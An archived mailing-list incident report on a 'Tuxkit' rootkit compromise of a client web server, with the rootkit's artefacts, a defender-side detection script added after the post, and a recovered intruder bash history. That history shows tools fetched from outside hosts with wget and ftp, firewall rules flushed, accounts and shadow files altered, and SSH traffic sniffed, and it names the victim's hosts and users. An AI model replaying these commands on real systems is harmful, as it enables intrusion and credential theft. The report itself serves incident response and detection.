A client's web server (Red Hat Linux 7.2) got cracked into very recently. I have re-created a mini filesystem of all the files the rootkit/crackers modified/installed on another system. The main culprit was the directory /dev/tux: modified binaries installed, password-less users added, tools downloaded, network sniffed, etc., etc.

One of the interesting things it does is install a rogue SSH2 server in /usr/bin/ssh2d that runs on a high-numbered port, and it modifies /etc/rc.d/init.d/network to start it whenever the network service goes up. It also modifies /etc/rc.d/rc.sysinit to start /usr/bin/xsf and /usr/bin/xchk, which it installs.

$ cat /dev/tux/ssh2/logo
________        __   .__         ____  __.__  __
\_____  \ _______/  |_|__| ____  |    |/ _|__|/  |_
 /   |   \\____ \   __\  |/ ___\ |      < |  \   __\
/    |    \  |_> >  | |  \  \___ |    |  \|  ||  |
\_______  /   __/|__| |__|\___  > |____|__ \__||__|
        \/|__|                \/          \/
Only For Da T.R.U O.C's
---------- end of cat command output ----------

...anything to do with Mark Adene (aka `Phiber Optic'), I wonder?

The files installed by the rootkit/crackers match a very detailed review of a rootkit called "Tuxkit" at the URL <http://www.hackinthebox.org/article.php?sid=5724>, also available at the URL <http://mel.ini2.net/p/tuxkit-analysis.txt> (which even advises on how to improve it).

At least one of the crackers who got in didn't know how to turn off his command history recording mechanism in bash, so I have a log of some of the commands during two of his logins (see footer of this e-mail).

This is my first time posting to this site. Please advise if this e-mail could be improved upon. I've written to Nelson, an author of chkrootkit, to offer any data/files so that this rootkit can be added for checking. If anyone else would like any of the files, just ask.

mark

(command history of cracker follows)
------------------------------------
export DISPLAY=c4zz1mb0cch10
telnet localhost
lynx
cd /var/www
ls
cd html
ls
cd /var/spool
ls -la
cd wu-ftpd-trojan
ls
make install
make
cd ..
ls
rm -rf wu-ftpd-trojan
ls -la
rm .wu.tar.gz
ls
cd samba
mkdir .tmp
cd .tmp
ls -la
wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.10.tar.gz
ls -la
export DISPLAY=c4zz1mb0cch10
telnet localhost
ls
ipchains
/sbin/ipchains
/sbin/ipchains -L
/sbin/iptables --help
/sbin/iptables --L
/sbin/iptables -L
/sbin/iptables -F
/sbin/ifconfig
netstat -na
cd /var/log
ls -la
cat xferlog
cd /lib/security/.config
ls
ls -la
cat .logs
./lpsched
cd ssh
ls
cd ..
dmesg |more
cd /home
ls
cd amartin
ls -la
cd ..
cd scripts
ls -la
cd ..
tspreckley
cd tspreckley
ls
cd ..
mhill
ls
cd mhill
ls -la
cd ..
ls -la
cd mnewby
ls -la
cd ..
ls -la
cd nhoskins
ls -la
cd ..
ls -la
cd ..
ls -la
cd /root
ls -la
cat .saves-2169-www.kenmare.co.uk~
cat rootat_private
ÿü2ÿôÿý ÿôÿýÿüóÿü;ÿü·ÿþìÿüðÿüÿü:ÿü
export DISPLAY=c4zz1mb0cch10
telnet localhost
ssh -p 15000 localhost
/sbin/ifconfig
ftp 62.98.168.235
ls -la
export DISPLAY=c4zz1mb0cch10
telnet localhost
ls -la
/sbin/route
/sbin/ifconfig
host keeper-dmz.kenmare.co.uk
nmap
telnet 192.168.66.111 21
ÿôÿý
route
/sbin/route
ping keeper-dmz.kenmare.co.uk
host gw
/sbin/route
host dmz
cat /etc/hosts
ps aux
kill -9 14576
finger
cd /home
ls
adduser tmp
/bin/adduser
/sbin/adduser
/usr/sbin/adduser
/usr/sbin/adduser tmp
passwd tmp
cat /etc/passwd
ls
exit
export DISPLAY=c4zz1mb0cch10
telnet locahost
ls -la
telnet localhost
exit
ls
lynx www.google.it
wget linux.minerva-is.cz/.tmp/.eg.tar.gz
mv .eg.tar.gz /var/spool
ls -la
cd lib
ls
mkdir .tmp
cd .tmp
mv /var/spool/.eg.tar.gz .eg.tar.gz
tar xvzf .eg.tar.gz
cd eggdrop1.6.10
cd ..
rm -rf .eg.tar.gz
rm -rf eggdrop1.6.10/
wget http://www.eggdrops.de/download/eggdrop1.6.1+IPv6+precompiled.tar.gz
tar xvzf eggdrop1.6.1+IPv6+precompiled.tar.gz
eg *.tar.gz
mv eggdrop1.6.1+IPv6_by_Akke/ .eg
rm eggdrop1.6.1+IPv6+precompiled.tar.gz
cd .eg
ls
rm eggdrop
ls
mv eggdrop-1.6.1 v0m3r0
rm *.conf
vi nnc
./v0m3r0 nnc -m
telnet localhost 3333
cd ..
ls
ls -la
ps aux
deluser tmp
rmuser
cd /home
ls
rm -rf tmp
vi /etc/passwd
vi /etc/passwd-
vi /etc/shadow
iptables -L
/sbin/iptables -L
exit
ls -la
cd /var/spool
ls -la
cd /lib
ls -la
cd .tmp
ls -la
cd .eg
ls -la
netstat -na
ÿôÿý
ÿôÿý
ÿôÿýÿôÿýÿôÿýÿôÿýÿôÿýÿôÿýexit
export DISPLAY=c4zz1mb0cch10
telnet localhost
adduser cos
/usr/bin/adduser
/usr/sbin/adduser
/usr/sbin/adduser cos
passwd cos
exit
ifconfig
/sbin/ifconfig
cd /lib/security/.config
ls -la
find / -name tcp.log
lynx
ls
wget
ftp 62.98.245.54
export DISPLAY=c4zz1mb0cch10
telnet localhost
lynx
tar xvzf sniffit.0.3.5.tar.gz
finger
cd sniffit.0.3.5
ls -la
./configure
make
ls -la
cd ..
mv sniffit.0.3.5 /var/spool/.tmp
rm sniffit.0.3.5.tar.gz
cd /var/spool/.tmp
ls
cd .tmp
ls -la
cd ..
ls -la
cd .tmp
ls -la
./sniffit
./sniffit -P tcp -p 22
/sbin/ifconfig
./sniffit -P tcp -p 22 -s 192.168.66.1
./sniffit -P tcp -p 22 -s 192.168.66.1 -L 10
vi README.FIRST
./sniffit -P tcp -p 22,21 -s 192.168.66.1 -L 1 -F eth0
./sniffit -P tcp -p 22 -s 192.168.66.1 -L 1 -F eth0
./sniffit -P tcp -p 22 -s 192.168.66.1 -L 1
./sniffit -P tcp -p 22 -L 1 -s 192.168.66.1
./sniffit -P tcp -p 22 -s 192.168.66.1
mv sniffit v0m3r0
ls
vi sample_config_file
cd ..
cd .tmp
rm -rf *
lynx
gcc -o v0m3r0 linsniffer.c
ls -la
cd /home
rm -rf cos
exit
-------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
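A defender-side check for the artefacts the post names (the /dev/tux directory, the rogue /usr/bin/ssh2d, the xsf/xchk binaries, the init-script hooks, and the hidden directories the cracker's history visits), written as an added example that is neither code from the post nor chkrootkit's own test. It takes an optional root prefix so a mounted image or the re-created mini filesystem can be examined rather than the live host; the empty-password-field check is an assumption about how the added password-less users would show up.

```shell
#!/bin/sh
# Added example (not code from the post, nor chkrootkit's own test): a
# defender-side check for the Tuxkit artefacts the post names.  ROOT is an
# optional prefix so a mounted image or the re-created mini filesystem can be
# examined instead of the live host.  Prints each hit and the total; exit
# status 0 means nothing was found.  The empty-password-field check is an
# assumption about how "password-less users added" shows up in /etc/passwd
# and /etc/shadow, not something the post spells out.

check_tuxkit() {
    root="${1:-}"
    hits=0
    # Files and directories the post says the kit installs, plus the two
    # hidden directories the cracker's history shows being used.
    for p in /dev/tux /usr/bin/ssh2d /usr/bin/xsf /usr/bin/xchk \
             /lib/security/.config /var/spool/.tmp; do
        if [ -e "$root$p" ]; then
            echo "FOUND: $root$p"
            hits=$((hits + 1))
        fi
    done
    # Persistence hooks: ssh2d started from the network init script,
    # xsf/xchk started from rc.sysinit.
    if [ -f "$root/etc/rc.d/init.d/network" ] &&
       grep -q 'ssh2d' "$root/etc/rc.d/init.d/network"; then
        echo "FOUND: ssh2d referenced in $root/etc/rc.d/init.d/network"
        hits=$((hits + 1))
    fi
    if [ -f "$root/etc/rc.d/rc.sysinit" ] &&
       grep -Eq 'xsf|xchk' "$root/etc/rc.d/rc.sysinit"; then
        echo "FOUND: xsf/xchk referenced in $root/etc/rc.d/rc.sysinit"
        hits=$((hits + 1))
    fi
    # Accounts with an empty password field (assumption: how the added
    # password-less users would appear).
    for f in /etc/passwd /etc/shadow; do
        [ -f "$root$f" ] || continue
        awk -F: -v f="$root$f" '$2 == "" { print "FOUND: empty password for " $1 " in " f }' "$root$f"
        n=$(awk -F: '$2 == "" { c++ } END { print c + 0 }' "$root$f")
        hits=$((hits + n))
    done
    echo "$hits indicator(s)"
    [ "$hits" -eq 0 ]
}
```

Run it as `check_tuxkit /mnt/image` against a copy of the compromised disk; on a live box run `check_tuxkit` with no argument, bearing in mind that trojaned ls/find/netstat binaries may hide what the kit installed, so a copy examined from a clean system is the more trustworthy input.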
This archive was generated by hypermail 2b30 : Thu May 02 2002 - 08:21:56 PDT